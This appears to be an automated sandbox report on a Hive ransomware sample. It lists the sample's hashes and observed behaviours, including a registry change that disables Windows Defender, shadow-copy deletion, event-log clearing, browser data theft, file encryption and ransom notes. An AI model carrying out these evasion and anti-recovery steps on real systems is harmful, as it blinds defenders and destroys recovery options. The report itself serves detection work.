Malware Analysis Report

2024-10-16 03:11

Sample ID: 220113-rj8ymsagb4
Target: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
SHA256: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
Tags: hive evasion ransomware spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
  Enterprise Matrix V6
Analysis: static1
  Detonation Overview
  Signatures
Analysis: behavioral1
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files
Analysis: behavioral2
  Detonation Overview
  Command Line
  Signatures
  Processes
  Network
  Files

Analysis Overview

Score: 10/10

SHA256: cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68

Threat Level: Known bad

The file cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68 was found to be: Known bad.

Malicious Activity Summary

hive evasion ransomware spyware stealer trojan

Modifies security service

Hive

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Clears Windows event logs

Deletes shadow copies

Modifies extensions of user files

Reads user/profile data of web browsers

Launches sc.exe

Drops file in Program Files directory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Runs net.exe

Interacts with shadow copies

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2022-01-13 14:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2022-01-13 14:14
Reported: 2022-01-13 14:19
Platform: win7-en-20211208
Max time kernel: 131s
Max time network: 125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Hive

ransomware hive

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\SysWOW64\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\handsafe.reg C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01680_.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_6WxssGD0Xtk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Slate\TAB_ON.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_8Go7NkPMSPg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_ue8PtMUtep40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui_4.0.100.v20140401-0608.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_fkVh5nljW3o0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\rt.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_Nn5REprYylU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0168644.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_dZhtTrAbC2o0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187819.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_0qvgVPcmFf40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\XLCPRTID.XML.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_naERseSDKM00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\settings.html C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsNotesBackground.wmv C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_DbctwuE_zXg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_0WW45ZpZf2g0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\DELETE.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_X2SoF_qr_C40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_eL0ZJ16DIgI0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\INDUST\PREVIEW.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_FruALYmTiJ00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\NotifierBackground.jpg.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_RtPE5-pYDWk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OLADD.FAE.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_lIQ2nJjTOUU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_l1B0vWLVj-Y0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-progress_zh_CN.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_NioLwwRjVdw0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_kM59pjtPVtA0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\de-DE\mshwLatin.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_YvL4SpyD0r00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_bpPiI9Wclqs0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\gadget.xml C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_13TRXlF6-L40.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TRANSLAT\FREN\WT61FR.LEX.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_Z8E-oRaf0cU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107146.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_rtplzwO_IPQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ku-ckb.txt.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_-YbGYchrw9w0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Title_Page_Ref.wmv C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\jmxremote.access.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_JHvJRFj85Ls0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0205462.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_K2PWy-J22Mg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Pitchbook.potx.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_2bSq3lrjvjg0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\InkWatson.exe.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0230553.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_-UDa75EWSJo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Flyout_Thumbnail_Shadow.png C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_nxODWGWa-1A0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BL00261_.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_byDWD0fhpYw0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\INFOPATH_K_COL.HXK.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_Il3egnRsAiU0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_srb6K6ax6jk0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\bookbig.gif.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_thwhE_iHHTw0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fiji.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_kEGfdCiyViQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.HK.XML.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_d0EQAuhH3LQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0188587.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_-N1pi17Owx80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\triggerActions.exsd.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_5yds9HCR84c0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_2y5abAVu_Xc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_ja.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb__10qzb5soNY0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.PPD.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_HvZ9sEr74rI0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\WSS\1100.accdt.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_oTmw4JchtsE0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_zh_4.4.0.v20140623020002.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_EzMv_yY2Qbc0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PSWAVY.WMF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_ejyzZ3oct6w0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR29F.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_dsWDZi5c9WE0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\THMBNAIL.PNG.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_GPVrh2xUfu00.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File created C:\Program Files\Java\jre7\lib\management\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Noronha.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_FNQSlWsTXQ80.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation.nl_ja_4.4.0.v20140623020002.jar.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_DA8BY5g9p_M0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_OFF.GIF.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_QkywsFw07ag0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BUTTON.JPG.gMrHcqAtLgPlvrMSkvMYzhuT-psV_vz0oP86JM9Uweb_spM1EdEXDHo0.fmu9d C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
